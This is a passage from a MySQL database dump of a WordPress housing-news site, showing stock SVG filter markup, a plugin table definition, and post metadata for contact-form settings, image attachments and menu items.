tableValues=\"0 1\" /><feFuncB type=\"table\" tableValues=\"0.71764705882353 0.25490196078431\" /><feFuncA type=\"table\" tableValues=\"1 1\" /></feComponentTransfer><feComposite in2=\"SourceGraphic\" operator=\"in\" /></filter></defs></svg><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 0 0\" width=\"0\" height=\"0\" focusable=\"false\" role=\"none\" style=\"visibility: hidden; position: absolute; left: -9999px; overflow: hidden;\" ><defs><filter id=\"wp-duotone-blue-red\"><feColorMatrix color-interpolation-filters=\"sRGB\" type=\"matrix\" values=\" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 \" /><feComponentTransfer color-interpolation-filters=\"sRGB\" ><feFuncR type=\"table\" tableValues=\"0 1\" /><feFuncG type=\"table\" tableValues=\"0 0.27843137254902\" /><feFuncB type=\"table\" tableValues=\"0.5921568627451 0.27843137254902\" /><feFuncA type=\"table\" tableValues=\"1 1\" /></feComponentTransfer><feComposite in2=\"SourceGraphic\" operator=\"in\" /></filter></defs></svg><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 0 0\" width=\"0\" height=\"0\" focusable=\"false\" role=\"none\" style=\"visibility: hidden; position: absolute; left: -9999px; overflow: hidden;\" ><defs><filter id=\"wp-duotone-midnight\"><feColorMatrix color-interpolation-filters=\"sRGB\" type=\"matrix\" values=\" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 \" /><feComponentTransfer color-interpolation-filters=\"sRGB\" ><feFuncR type=\"table\" tableValues=\"0 0\" /><feFuncG type=\"table\" tableValues=\"0 0.64705882352941\" /><feFuncB type=\"table\" tableValues=\"0 1\" /><feFuncA type=\"table\" tableValues=\"1 1\" /></feComponentTransfer><feComposite in2=\"SourceGraphic\" operator=\"in\" /></filter></defs></svg><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 0 0\" width=\"0\" height=\"0\" focusable=\"false\" role=\"none\" style=\"visibility: hidden; position: absolute; left: -9999px; overflow: hidden;\" ><defs><filter id=\"wp-duotone-magenta-yellow\"><feColorMatrix color-interpolation-filters=\"sRGB\" type=\"matrix\" values=\" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 \" /><feComponentTransfer color-interpolation-filters=\"sRGB\" ><feFuncR type=\"table\" tableValues=\"0.78039215686275 1\" /><feFuncG type=\"table\" tableValues=\"0 0.94901960784314\" /><feFuncB type=\"table\" tableValues=\"0.35294117647059 0.47058823529412\" /><feFuncA type=\"table\" tableValues=\"1 1\" /></feComponentTransfer><feComposite in2=\"SourceGraphic\" operator=\"in\" /></filter></defs></svg><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 0 0\" width=\"0\" height=\"0\" focusable=\"false\" role=\"none\" style=\"visibility: hidden; position: absolute; left: -9999px; overflow: hidden;\" ><defs><filter id=\"wp-duotone-purple-green\"><feColorMatrix color-interpolation-filters=\"sRGB\" type=\"matrix\" values=\" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 \" /><feComponentTransfer color-interpolation-filters=\"sRGB\" ><feFuncR type=\"table\" tableValues=\"0.65098039215686 0.40392156862745\" /><feFuncG type=\"table\" tableValues=\"0 1\" /><feFuncB type=\"table\" tableValues=\"0.44705882352941 0.4\" /><feFuncA type=\"table\" tableValues=\"1 1\" /></feComponentTransfer><feComposite in2=\"SourceGraphic\" operator=\"in\" /></filter></defs></svg><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 0 0\" width=\"0\" height=\"0\" focusable=\"false\" role=\"none\" style=\"visibility: hidden; position: absolute; left: -9999px; overflow: hidden;\" ><defs><filter id=\"wp-duotone-blue-orange\"><feColorMatrix color-interpolation-filters=\"sRGB\" type=\"matrix\" values=\" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 \" /><feComponentTransfer color-interpolation-filters=\"sRGB\" ><feFuncR type=\"table\" tableValues=\"0.098039215686275 1\" /><feFuncG type=\"table\" tableValues=\"0 0.66274509803922\" /><feFuncB type=\"table\" tableValues=\"0.84705882352941 0.41960784313725\" /><feFuncA type=\"table\" tableValues=\"1 1\" /></feComponentTransfer><feComposite in2=\"SourceGraphic\" operator=\"in\" /></filter></defs></svg>','no');
/*!40000 ALTER TABLE `wp_options` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_pluginSL_spam_captcha`
--
DROP TABLE IF EXISTS `wp_pluginSL_spam_captcha`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_pluginSL_spam_captcha` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`id_comment` mediumint(9) NOT NULL,
`status` varchar(10) DEFAULT 'ok',
`new_status` varchar(10) DEFAULT 'ok',
`author` text DEFAULT NULL,
`content` text DEFAULT NULL,
`captcha_info` text DEFAULT NULL,
`date` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
UNIQUE KEY `id_post` (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_pluginSL_spam_captcha`
--
LOCK TABLES `wp_pluginSL_spam_captcha` WRITE;
/*!40000 ALTER TABLE `wp_pluginSL_spam_captcha` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_pluginSL_spam_captcha` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_postmeta`
--
DROP TABLE IF EXISTS `wp_postmeta`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_postmeta` (
`meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`post_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`meta_key` varchar(255) DEFAULT NULL,
`meta_value` longtext DEFAULT NULL,
PRIMARY KEY (`meta_id`),
KEY `post_id` (`post_id`),
KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=652 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_postmeta`
--
LOCK TABLES `wp_postmeta` WRITE;
/*!40000 ALTER TABLE `wp_postmeta` DISABLE KEYS */;
INSERT INTO `wp_postmeta` VALUES (1,2,'_wp_page_template','default'),(2,2,'_edit_lock','1480432403:1'),(3,2,'_edit_last','1'),(4,6,'_edit_last','1'),(5,6,'_wp_page_template','default'),(6,6,'_edit_lock','1480432757:1'),(7,8,'_form','<label> Your Name (required)\n [text* your-name] </label>\n\n<label> Your Email (required)\n [email* your-email] </label>\n\n<label> Subject\n [text your-subject] </label>\n\n<label> Your Message\n [textarea your-message] </label>\n\n[submit \"Send\"]'),(8,8,'_mail','a:8:{s:7:\"subject\";s:30:\"Housing Today \"[your-subject]\"\";s:6:\"sender\";s:43:\"[your-name] <wordpress@housing-today.co.uk>\";s:4:\"body\";s:178:\"From: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n--\nThis e-mail was sent from a contact form on Housing Today (https://housing-today.co.uk)\";s:9:\"recipient\";s:25:\"leads@vanillacircus.co.uk\";s:18:\"additional_headers\";s:22:\"Reply-To: [your-email]\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;s:13:\"exclude_blank\";b:0;}'),(9,8,'_mail_2','a:9:{s:6:\"active\";b:0;s:7:\"subject\";s:30:\"Housing Today \"[your-subject]\"\";s:6:\"sender\";s:45:\"Housing Today <wordpress@housing-today.co.uk>\";s:4:\"body\";s:120:\"Message Body:\n[your-message]\n\n--\nThis e-mail was sent from a contact form on Housing Today (https://housing-today.co.uk)\";s:9:\"recipient\";s:12:\"[your-email]\";s:18:\"additional_headers\";s:39:\"Reply-To: zoe.allen@vanillacircus.co.uk\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;s:13:\"exclude_blank\";b:0;}'),(10,8,'_messages','a:23:{s:12:\"mail_sent_ok\";s:45:\"Thank you for your message. It has been sent.\";s:12:\"mail_sent_ng\";s:71:\"There was an error trying to send your message. Please try again later.\";s:16:\"validation_error\";s:61:\"One or more fields have an error. Please check and try again.\";s:4:\"spam\";s:71:\"There was an error trying to send your message. Please try again later.\";s:12:\"accept_terms\";s:69:\"You must accept the terms and conditions before sending your message.\";s:16:\"invalid_required\";s:22:\"The field is required.\";s:16:\"invalid_too_long\";s:22:\"The field is too long.\";s:17:\"invalid_too_short\";s:23:\"The field is too short.\";s:12:\"invalid_date\";s:29:\"The date format is incorrect.\";s:14:\"date_too_early\";s:44:\"The date is before the earliest one allowed.\";s:13:\"date_too_late\";s:41:\"The date is after the latest one allowed.\";s:13:\"upload_failed\";s:46:\"There was an unknown error uploading the file.\";s:24:\"upload_file_type_invalid\";s:49:\"You are not allowed to upload files of this type.\";s:21:\"upload_file_too_large\";s:20:\"The file is too big.\";s:23:\"upload_failed_php_error\";s:38:\"There was an error uploading the file.\";s:14:\"invalid_number\";s:29:\"The number format is invalid.\";s:16:\"number_too_small\";s:47:\"The number is smaller than the minimum allowed.\";s:16:\"number_too_large\";s:46:\"The number is larger than the maximum allowed.\";s:23:\"quiz_answer_not_correct\";s:36:\"The answer to the quiz is incorrect.\";s:17:\"captcha_not_match\";s:31:\"Your entered code is incorrect.\";s:13:\"invalid_email\";s:38:\"The e-mail address entered is invalid.\";s:11:\"invalid_url\";s:19:\"The URL is invalid.\";s:11:\"invalid_tel\";s:32:\"The telephone number is invalid.\";}'),(11,8,'_additional_settings',''),(12,8,'_locale','en_US'),(13,6,'_yoast_wpseo_content_score','30'),(15,10,'_wp_attached_file','2016/11/home.jpg'),(16,10,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:540;s:4:\"file\";s:16:\"2016/11/home.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"home-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"home-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"home-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"DSC-HX400V\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"8.41\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(17,10,'_wp_attachment_is_custom_background','nirvana'),(18,11,'_wp_attached_file','2016/11/lost-places.jpg'),(19,11,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:635;s:4:\"file\";s:23:\"2016/11/lost-places.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"lost-places-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"lost-places-300x198.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"lost-places-768x508.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:508;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:11:\"NIKON D3300\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:17:\"0.066666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(20,11,'_wp_attachment_is_custom_background','nirvana'),(21,1,'_edit_lock','1612182480:1'),(23,13,'_wp_attached_file','2016/11/interior-design.jpg'),(24,13,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:576;s:4:\"file\";s:27:\"2016/11/interior-design.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"interior-design-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"interior-design-300x180.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"interior-design-768x461.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:461;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"custom\";a:4:{s:4:\"file\";s:27:\"interior-design-250x150.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:26:\"interior-design-150x90.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"header\";a:4:{s:4:\"file\";s:27:\"interior-design-960x150.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"columns\";a:4:{s:4:\"file\";s:27:\"interior-design-397x311.jpg\";s:5:\"width\";i:397;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25,1,'_edit_last','1'),(26,1,'_thumbnail_id','13'),(29,1,'_yoast_wpseo_content_score','30'),(31,1,'_wp_old_slug','hello-world'),(32,1,'_yoast_wpseo_primary_category','2'),(33,15,'_edit_last','1'),(34,15,'_edit_lock','1612182624:1'),(37,15,'_yoast_wpseo_content_score','30'),(39,15,'_yoast_wpseo_primary_category','3'),(40,17,'_wp_attached_file','2016/11/kitchen.jpg'),(41,17,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:19:\"2016/11/kitchen.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"kitchen-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"kitchen-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"kitchen-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"custom\";a:4:{s:4:\"file\";s:19:\"kitchen-225x150.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"kitchen-150x100.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"header\";a:4:{s:4:\"file\";s:19:\"kitchen-960x150.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"slider\";a:4:{s:4:\"file\";s:19:\"kitchen-960x580.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"columns\";a:4:{s:4:\"file\";s:19:\"kitchen-397x311.jpg\";s:5:\"width\";i:397;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"6.3\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:21:\"Canon EOS 5D Mark III\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"47\";s:3:\"iso\";s:3:\"640\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(42,15,'_thumbnail_id','81'),(48,19,'_edit_last','1'),(49,19,'_edit_lock','1615290844:1'),(50,20,'_wp_attached_file','2016/11/roofs.jpg'),(51,20,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:540;s:4:\"file\";s:17:\"2016/11/roofs.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"roofs-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"roofs-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"roofs-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"custom\";a:4:{s:4:\"file\";s:17:\"roofs-250x141.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:141;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:16:\"roofs-150x84.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"header\";a:4:{s:4:\"file\";s:17:\"roofs-960x150.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"columns\";a:4:{s:4:\"file\";s:17:\"roofs-397x311.jpg\";s:5:\"width\";i:397;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(52,19,'_thumbnail_id','20'),(55,19,'_yoast_wpseo_content_score','60'),(57,19,'_yoast_wpseo_primary_category','4'),(65,25,'_wp_attached_file','2016/11/roof-plate.jpg'),(66,25,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:635;s:4:\"file\";s:22:\"2016/11/roof-plate.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"roof-plate-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"roof-plate-300x198.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"roof-plate-768x508.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:508;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"custom\";a:4:{s:4:\"file\";s:22:\"roof-plate-227x150.jpg\";s:5:\"width\";i:227;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"roof-plate-150x99.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:99;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"header\";a:4:{s:4:\"file\";s:22:\"roof-plate-960x150.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"slider\";a:4:{s:4:\"file\";s:22:\"roof-plate-960x580.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"columns\";a:4:{s:4:\"file\";s:22:\"roof-plate-397x311.jpg\";s:5:\"width\";i:397;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(70,27,'_menu_item_type','post_type'),(71,27,'_menu_item_menu_item_parent','0'),(72,27,'_menu_item_object_id','19'),(73,27,'_menu_item_object','post'),(74,27,'_menu_item_target',''),(75,27,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(76,27,'_menu_item_xfn',''),(77,27,'_menu_item_url',''),(78,28,'_menu_item_type','post_type'),(79,28,'_menu_item_menu_item_parent','0'),(80,28,'_menu_item_object_id','15'),(81,28,'_menu_item_object','post'),(82,28,'_menu_item_target',''),(83,28,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(84,28,'_menu_item_xfn',''),(85,28,'_menu_item_url',''),(86,29,'_menu_item_type','post_type'),(87,29,'_menu_item_menu_item_parent','0'),(88,29,'_menu_item_object_id','1'),(89,29,'_menu_item_object','post'),(90,29,'_menu_item_target',''),(91,29,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(92,29,'_menu_item_xfn',''),(93,29,'_menu_item_url',''),(94,30,'_menu_item_type','custom'),(95,30,'_menu_item_menu_item_parent','0'),(96,30,'_menu_item_object_id','30'),(97,30,'_menu_item_object','custom'),(98,30,'_menu_item_target',''),(99,30,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(100,30,'_menu_item_xfn',''),(101,30,'_menu_item_url','https://housing-today.co.uk'),(102,31,'_menu_item_type','post_type'),(103,31,'_menu_item_menu_item_parent','0'),(104,31,'_menu_item_object_id','6'),(105,31,'_menu_item_object','page'),(106,31,'_menu_item_target',''),(107,31,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(108,31,'_menu_item_xfn',''),(109,31,'_menu_item_url',''),(110,32,'_menu_item_type','post_type'),(111,32,'_menu_item_menu_item_parent','0'),(112,32,'_menu_item_object_id','2'),(113,32,'_menu_item_object','page'),(114,32,'_menu_item_target',''),(115,32,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(116,32,'_menu_item_xfn',''),(117,32,'_menu_item_url',''),(118,33,'_wp_attached_file','2016/11/cropped-lost-places.jpg'),(119,33,'_wp_attachment_context','custom-header'),(120,33,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:300;s:4:\"file\";s:31:\"2016/11/cropped-lost-places.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"cropped-lost-places-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"cropped-lost-places-300x94.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:94;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"cropped-lost-places-768x240.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:31:\"cropped-lost-places-300x250.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"vega-post-thumbnail-recent\";a:4:{s:4:\"file\";s:31:\"cropped-lost-places-350x220.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(121,33,'_wp_attachment_custom_header_last_used_vega','1480435590'),(122,33,'_wp_attachment_is_custom_header','vega'),(123,35,'_edit_last','1'),(124,35,'_edit_lock','1525353012:1'),(127,35,'_yoast_wpseo_content_score','30'),(129,35,'_yoast_wpseo_primary_category','4'),(130,37,'_wp_attached_file','2018/05/builder.jpg'),(131,37,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:639;s:4:\"file\";s:19:\"2018/05/builder.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"builder-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"builder-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"builder-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"builder-300x250.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"vega-post-thumbnail-recent\";a:4:{s:4:\"file\";s:19:\"builder-350x220.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(132,35,'_thumbnail_id','37'),(135,19,'wpmdr_menu','1'),(138,1,'wpmdr_menu','1'),(139,35,'wpmdr_menu','1'),(140,15,'wpmdr_menu','1'),(141,2,'wpmdr_menu','1'),(142,6,'wpmdr_menu','1'),(143,10,'wpmdr_menu','1'),(145,59,'_wp_attached_file','2019/02/household-rubbish.jpg'),(146,59,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:29:\"2019/02/household-rubbish.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"household-rubbish-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"household-rubbish-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"household-rubbish-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:29:\"household-rubbish-300x250.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"vega-post-thumbnail-recent\";a:4:{s:4:\"file\";s:29:\"household-rubbish-350x220.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\